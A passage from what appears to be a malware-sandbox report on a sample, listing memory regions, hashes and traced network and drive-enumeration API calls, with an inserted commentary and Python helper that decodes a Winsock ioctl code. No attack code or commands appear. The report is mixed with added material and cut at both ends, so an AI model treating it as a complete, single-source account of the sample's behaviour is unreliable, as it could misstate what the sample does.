                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$Inf$NaN
                                                              • API String ID: 0-141429178
                                                              • Opcode ID: 6a5e243a8ada1d3025f001aa790135e69dfc0f3ee51a9e4c6fba60c86f00b3fc
                                                              • Instruction ID: fec0192c8d2a4378a31f60bc057d0e5f18af98009cd46245330f97f0267b3d5d
                                                              • Opcode Fuzzy Hash: 6a5e243a8ada1d3025f001aa790135e69dfc0f3ee51a9e4c6fba60c86f00b3fc
                                                              • Instruction Fuzzy Hash: 59F1D23162C38ACBD721DF68C0847ABBBE2BB95314F048A1DD9DD87389D7759905CB82

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: function at e975e0; calls socket, e972a0, e9cb20 and 1218c50 (rendered graph; the node and edge listing is omitted)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory regions as listed for the first entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 9f732535a58035a975b3c5ae8801feecd302bbb4d9a9ecdd54de4f2c7a4b1592
                                                              • Instruction ID: cc44b9bce3343f7f222e3885894aa757b076c0b291a5c86eaa667614dd393939
                                                              • Opcode Fuzzy Hash: 9f732535a58035a975b3c5ae8801feecd302bbb4d9a9ecdd54de4f2c7a4b1592
                                                              • Instruction Fuzzy Hash: 4A1159B1A2421077EB315A2EAC06E5B3F88DF91B34F551925F864A72E2D2318C5C93D1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: function at eca150; calls getsockname, ecef30, ead090 and ed4f40 (rendered graph; the node and edge listing is omitted)
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00ECA1C7
                                                              Strings
                                                              • getsockname() failed with errno %d: %s, xrefs: 00ECA1F0
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00ECA23B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory regions as listed for the first entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: f11024f979621d57eccce3999964b822ad1f749847a12250c984bc9c15632f3f
                                                              • Instruction ID: 1a9900dcd74ab33a60fdf8664d5c6bb74f285771baaaa4f2e46662edf3941d9d
                                                              • Opcode Fuzzy Hash: f11024f979621d57eccce3999964b822ad1f749847a12250c984bc9c15632f3f
                                                              • Instruction Fuzzy Hash: 10210C71908284BAF7259758DC42FE773BCEF91328F041618F99863151FB33698687E2
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 00EAD65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory regions as listed for the first entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: 4acf6e230b3475b81dddfc9838235f086b8ce4574b39f5d65555d89f1fa4cf27
                                                              • Instruction ID: 191e494dd88b76ec3b3122809cecdf8e42a95285b082a16a31570dffee41f427
                                                              • Opcode Fuzzy Hash: 4acf6e230b3475b81dddfc9838235f086b8ce4574b39f5d65555d89f1fa4cf27
                                                              • Instruction Fuzzy Hash: CE01FCE094834157E7616B7CAC1B36625D06B97308F491868D89DAB196F72DC58CC293
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00F5AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00F5ABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory regions as listed for the first entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: f5b1113a7ed1008f69401171f8da5de36f96e1d5e79bdce9f296bae1060c5055
                                                              • Instruction ID: 392bebd841995a9a7f526ad5bb1cae1da0b6d9ab991d74a8fa21fca3448fa678
                                                              • Opcode Fuzzy Hash: f5b1113a7ed1008f69401171f8da5de36f96e1d5e79bdce9f296bae1060c5055
                                                              • Instruction Fuzzy Hash: BAE1E270A043019BEB20CF15C845B6A77E1FF85321F044A2CFE999B291E775D968EB93
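The control code 8004667E passed to ioctlsocket in the entry above is FIONBIO, and the argument 00000001 switches the socket that was just created into non-blocking mode. The decoder below is added here as an example; it is not code from the report or from the analysed sample. It splits any Winsock ioctl code into the direction, parameter-size, group and command fields that the _IO/_IOR/_IOW macros in winsock.h pack into the value; the constants and the three named codes in its table are the ones winsock.h defines, and describe_ioctlsocket is an assumed helper name.

```python
# Decode Winsock ioctl control codes (the second argument of ioctlsocket)
# into the fields packed by the _IO/_IOR/_IOW macros in winsock.h.
# Added example; not code from the analysed sample or from Joe Sandbox.

IOC_VOID = 0x20000000       # no parameters
IOC_OUT = 0x40000000        # copy parameters out
IOC_IN = 0x80000000         # copy parameters in
IOC_INOUT = IOC_IN | IOC_OUT
IOCPARM_MASK = 0x7F         # parameter length, at most 128 bytes


def ioc(direction, group, num, size=0):
    """Build a control code exactly as winsock.h's _IO/_IOR/_IOW macros do."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


# The socket ioctls winsock.h itself defines (all take a u_long, size 4).
KNOWN_CODES = {
    ioc(IOC_IN, "f", 126, 4): "FIONBIO",     # 0x8004667E: set/clear non-blocking I/O
    ioc(IOC_OUT, "f", 127, 4): "FIONREAD",   # 0x4004667F: bytes readable without blocking
    ioc(IOC_OUT, "s", 7, 4): "SIOCATMARK",   # 0x40047307: at out-of-band mark?
}


def decode_ioctl(code):
    """Split a 32-bit control code into its encoded fields.

    Returns the direction, parameter size, group character, command
    number and, when the code is in KNOWN_CODES, its symbolic name.
    """
    code &= 0xFFFFFFFF
    direction = {
        IOC_VOID: "void",
        IOC_IN: "in",
        IOC_OUT: "out",
        IOC_INOUT: "inout",
    }.get(code & 0xE0000000, "unknown")
    return {
        "code": code,
        "direction": direction,
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
        "name": KNOWN_CODES.get(code, "unknown"),
    }


def describe_ioctlsocket(code, argp_value):
    """Summarise an ioctlsocket(s, code, &argp) call as it appears in an
    API trace, e.g. ioctlsocket.WS2_32(00000000,8004667E,00000001)."""
    d = decode_ioctl(code)
    if d["name"] == "FIONBIO":
        mode = "non-blocking" if argp_value else "blocking"
        return f"FIONBIO: set socket to {mode} mode"
    return (f"{d['name']}: group '{d['group']}' cmd {d['number']} "
            f"({d['direction']}, {d['size']}-byte arg)")


if __name__ == "__main__":
    # The values recorded in the report entry above.
    print(decode_ioctl(0x8004667E))
    print(describe_ioctlsocket(0x8004667E, 1))
```

Creating the socket and immediately setting FIONBIO is the usual prelude to a connect() driven by select() or a timeout loop, which fits the client-side Winsock calls listed in the other entries of this dump.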
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 2538213e72b71501e87977045eb26fcf61fd0c43143ff404397fdd87f92db1b8
                                                              • Instruction ID: 21aed41b50f7839c2c7b3322c160e7f4f955625b1b2123336d338d572e334c12
                                                              • Opcode Fuzzy Hash: 2538213e72b71501e87977045eb26fcf61fd0c43143ff404397fdd87f92db1b8
                                                              • Instruction Fuzzy Hash: 8C5194EB26C121BD714AC0851B54EFB5AEFE5CF770F328426B40BD6682E7988E891171
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: a1227811d5468a365d5b54c3f2e27362f60524d2c5c6ba3e993e6388423a4e20
                                                              • Instruction ID: 0fbd59c92478e84b7de28a0a440dc9dc961b7e6b932393e700f20fb5b366666f
                                                              • Opcode Fuzzy Hash: a1227811d5468a365d5b54c3f2e27362f60524d2c5c6ba3e993e6388423a4e20
                                                              • Instruction Fuzzy Hash: 0E5185EB26C121BD714AC0851B54EFB5AEFE5CF770F338426B40BD6682E7988E4A1171
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7d33fd25cec8b70a9ca2c72db862d7e7aa6bdbb56aee24a170d1bcd455304fcb
                                                              • Instruction ID: 1e225f4f8e939c96903b52a10960a4c882aab6ea5feea158ed496378c88e84f1
                                                              • Opcode Fuzzy Hash: 7d33fd25cec8b70a9ca2c72db862d7e7aa6bdbb56aee24a170d1bcd455304fcb
                                                              • Instruction Fuzzy Hash: 2D51C5EB26C125BE710AC0851B54EFB6AEFE1CF770B328426F407D66C2E3984E4A5171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 13eba557537f9173668ae61c23883b1cf437b739ee0046db44459749b19016cf
                                                              • Instruction ID: 0a1e8b28fcf3407d8317a070ef5a4bd1dc1325bcb302de797c3c18d38de1261a
                                                              • Opcode Fuzzy Hash: 13eba557537f9173668ae61c23883b1cf437b739ee0046db44459749b19016cf
                                                              • Instruction Fuzzy Hash: 5841E9EB26C121FD715AC0851B54AFB6AEFE5CF770F328426F407D6582E3984E4A1171
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7cee3dbd3ba9d52d4dda8504d11e1e8d878f21ee42d2871b7a1a3e7076632ca7
                                                              • Instruction ID: 8837ed025ad08be6609f5b64c37618c4e59961cd75b180164b1943ac68037d38
                                                              • Opcode Fuzzy Hash: 7cee3dbd3ba9d52d4dda8504d11e1e8d878f21ee42d2871b7a1a3e7076632ca7
                                                              • Instruction Fuzzy Hash: C741A7EB26C121BD710AC0851B54EFB5AEFE5CF770F328426F407D6582E3984E491171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d8f958b68943a295d17f981c3a4480dd8c8d9a3eed26019a7d556b161c34a5ec
                                                              • Instruction ID: a10e92e941145c4e46dd8b1f6ec14f87b7772e35dba126bf26e03e1f8fed2eb5
                                                              • Opcode Fuzzy Hash: d8f958b68943a295d17f981c3a4480dd8c8d9a3eed26019a7d556b161c34a5ec
                                                              • Instruction Fuzzy Hash: 9E41F7E716C151BEB20AC1851B54AFB6BAFE6CF730B328426F407D7582E3984A494271
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 35e122e1bfbbb998f8510167ec79c5c8445c7483ba66562a9946aa285ff3d0cd
                                                              • Instruction ID: 4679d17791bc306a0d70040ef671a3979a2a6eb8269d443aeb03f7c4279ff7a4
                                                              • Opcode Fuzzy Hash: 35e122e1bfbbb998f8510167ec79c5c8445c7483ba66562a9946aa285ff3d0cd
                                                              • Instruction Fuzzy Hash: 1F41D7E716C111BE720AC1851B54EFB6BAFE5CF730B328426F407D7582E3984A495271
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 17643fc9dd80780eb593d8e75a5c48101f0ac5bd40d44bb9b1742d47faf4d357
                                                              • Instruction ID: 799479823c3c8f410f4a9439c47c0b2395140a7ae9e5bd89b784531a033df175
                                                              • Opcode Fuzzy Hash: 17643fc9dd80780eb593d8e75a5c48101f0ac5bd40d44bb9b1742d47faf4d357
                                                              • Instruction Fuzzy Hash: 5C41A5EB26C121BD710AC1852B54EFB5AEFE5CF770F328426F40BD6682E7988E491171
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 5e96bd050c981a3cd141b0de02a4278aa619f50237c069a85033ecfbeeffb860
                                                              • Instruction ID: 65534debdff36648acd0ffb1290f1a0f950e6c7b53401829d9c9bc0dc4653027
                                                              • Opcode Fuzzy Hash: 5e96bd050c981a3cd141b0de02a4278aa619f50237c069a85033ecfbeeffb860
                                                              • Instruction Fuzzy Hash: 7C41D9E716C121BD720AC1851B54EFB6AEFE5CF770F328426F407D6582E3984E495171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3957b9902cc4d255e07279ff7a8a977adf522d677d82711bc995d2e8a0fcb9bf
                                                              • Instruction ID: a72452b9144796d4a07e3245a373b537fa150d143ee57c45bc891e3599c923da
                                                              • Opcode Fuzzy Hash: 3957b9902cc4d255e07279ff7a8a977adf522d677d82711bc995d2e8a0fcb9bf
                                                              • Instruction Fuzzy Hash: 4441B4EB26C121BE714AC0851B54EFB5AEFE5CF770F328426F40BD6682E7988E491171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 452f3e6d23733c360db8de245308d7e62ef8d9d8e4329b221391cd6f542adaab
                                                              • Instruction ID: 9f4e6345f7051b2cc0c6fdf8d756c4d5f0f243d58cf0be1c92b2aa056fa8e033
                                                              • Opcode Fuzzy Hash: 452f3e6d23733c360db8de245308d7e62ef8d9d8e4329b221391cd6f542adaab
                                                              • Instruction Fuzzy Hash: EE41B6EB16C121BD711AC1852B54EFB5AEFE5CF770F328426F40BD6682E3988E491171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: c41c412fe3a329edf8a9505dd7e4155c2b9f45a65320dd6bf415ac420b23baef
                                                              • Instruction ID: 637a3533a878b9f06d5fc3276ffc0a8a231cfcead94ab6b7b85a9b039a1b6f74
                                                              • Opcode Fuzzy Hash: c41c412fe3a329edf8a9505dd7e4155c2b9f45a65320dd6bf415ac420b23baef
                                                              • Instruction Fuzzy Hash: 52412BE725C261BEB20AC1511B54AFB6BEFE5CB730F328427F407D6582D3984A495231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3d97f41175883fe8a48650dc58fa952880941a299d5815a88368e37b77b896a5
                                                              • Instruction ID: 50c93e3d2deb0ba9de5a2013f425bd2352998ad1a2d3d9e4b8fef54c726d1463
                                                              • Opcode Fuzzy Hash: 3d97f41175883fe8a48650dc58fa952880941a299d5815a88368e37b77b896a5
                                                              • Instruction Fuzzy Hash: 8D31D7EB16C121BE710AC1852B54EFB5AEFE5CF730F328426F407D6682E7984E491231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: c2e0e4c745ee5b24beef62a25b934958607ae8ead23d3c81746ed9ea5fc3a0af
                                                              • Instruction ID: a20814deda861fa7195e981b13f66993b146ad12b86704ee067e606123f8bcf5
                                                              • Opcode Fuzzy Hash: c2e0e4c745ee5b24beef62a25b934958607ae8ead23d3c81746ed9ea5fc3a0af
                                                              • Instruction Fuzzy Hash: FB3194EB16C121BE724AC1852B54EFB6AAFE5CF730B328426B407D6686D7984A491231
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: dc73421b61a89a0e70098b19ead6703a54ec4e39db77ff752d29eaae3da1b5df
                                                              • Instruction ID: 362e067d90b846b5e2868e777f8bd13743aca4121db49305b2c02277741845aa
                                                              • Opcode Fuzzy Hash: dc73421b61a89a0e70098b19ead6703a54ec4e39db77ff752d29eaae3da1b5df
                                                              • Instruction Fuzzy Hash: 3E51E6B1D143045BEF60AA709C42BA736E8AF51358F081478E88DFB253FB75E909C792
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 02d3da4318247deafd3133fdf86ed96587c7909ba51e6e904ab23ca40a5df9b8
                                                              • Instruction ID: 3b860e97bdffeee3fae974fab63843960cb5de7a9ab068492cbca2148c4132c3
                                                              • Opcode Fuzzy Hash: 02d3da4318247deafd3133fdf86ed96587c7909ba51e6e904ab23ca40a5df9b8
                                                              • Instruction Fuzzy Hash: 373186EB16C121BE714AC1852B54EFB6AEFE6CF730B328426B507D2686D7984F491231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d3338a9b82abb400d59a4ebe33316ddd7e3b04d8f66dc7f55a8fe58630907455
                                                              • Instruction ID: 20a9789655e77809ad48612704e208ce7a2615f70a7d4828040f8b6b105a1b18
                                                              • Opcode Fuzzy Hash: d3338a9b82abb400d59a4ebe33316ddd7e3b04d8f66dc7f55a8fe58630907455
                                                              • Instruction Fuzzy Hash: 703194EB16D111BEB50AC1956754EFBABAFE6CF730B328027F407D2642D3984A491231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 09ed26d531616edecf09c3b4bc8c49d27498666ba30727f3dc3c492556355fb1
                                                              • Instruction ID: 3974c6c6a32434bebca33ce420ae50455f03081912ff5e19e6acf190332ae18d
                                                              • Opcode Fuzzy Hash: 09ed26d531616edecf09c3b4bc8c49d27498666ba30727f3dc3c492556355fb1
                                                              • Instruction Fuzzy Hash: 5A3186EB16C115BE710AC5816B54EFB5AEFE6CF730B328426F407D2686D7984E491231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7166a730819dd819271c0d0b3b3430ad1addbba79d3ab62c528b529cb9a5aa66
                                                              • Instruction ID: aae0f44b38018747d3767775384f8a3c1ba0b4aba802e115053205853d616b24
                                                              • Opcode Fuzzy Hash: 7166a730819dd819271c0d0b3b3430ad1addbba79d3ab62c528b529cb9a5aa66
                                                              • Instruction Fuzzy Hash: A731A8EB16C111BEB106C1856B54AFB6BEFE6CF730F328426F407D2682D3980E491231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d808896e3f8ad0dd0a53ab8c3f6f75c2317904a96d5bf77ae3a3bf92054b857a
                                                              • Instruction ID: 0027d5daebdd9b9f5e0243b8fe3fe1589af6f67fc0864d8a3592fd2b87ef9b94
                                                              • Opcode Fuzzy Hash: d808896e3f8ad0dd0a53ab8c3f6f75c2317904a96d5bf77ae3a3bf92054b857a
                                                              • Instruction Fuzzy Hash: FC3184EB16C111BEB106C1856B54AFB6AAFE6CF730B328427F507D2646D3984F491231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 09d292024cf244b99b4b1d5a44dc76390f92c6cf083059753fc026c3fd56397f
                                                              • Instruction ID: a0cfcdcc182847ad9074a0dd3b2dc7b84d3bb709d70c416bafb2b22962031d21
